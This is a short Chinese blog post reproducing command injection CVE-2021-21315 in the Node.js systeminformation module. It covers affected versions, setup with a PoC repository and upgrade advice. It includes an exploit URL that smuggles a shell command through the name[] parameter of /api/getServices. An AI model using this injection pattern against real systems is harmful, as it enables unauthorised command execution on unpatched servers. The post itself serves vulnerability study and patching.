首页 > 编程知识 文章详情

Node.js命令注入漏洞(CVE-2021-21315)复现

编程知识 更新时间:2023-05-01 23:51:30

简介

 

Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。

 

影响版本

 

Systeminformation < 5.3.1

 

环境搭建

 

这里用node10.16.0进行测试

源码下载

git clone https://github/ForbiddenProgrammer/CVE-2021-21315-PoC.git

 nodejs开启http 

node index.js

 

漏洞复现

 

http://192.168.204.131:8000/api/getServices?name[]=$(echo 'testtest' > test.txt)

 

修复建议

 

升级到安全版本

下载链接:

https://www.npmjs/package/systeminformation

 

更多推荐

Node.js命令注入漏洞(CVE-2021-21315)复现

本文发布于:2023-04-24 15:08:00,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/8a38bc7d434691daeb723dd54c8947be.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:漏洞   命令   js   Node   CVE

相关文章

发布评论

评论列表 (有 0 条评论)

最近发表

草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!

  • 100909文章数
  • 26077阅读数
  • 0评论数

热门文章

标签列表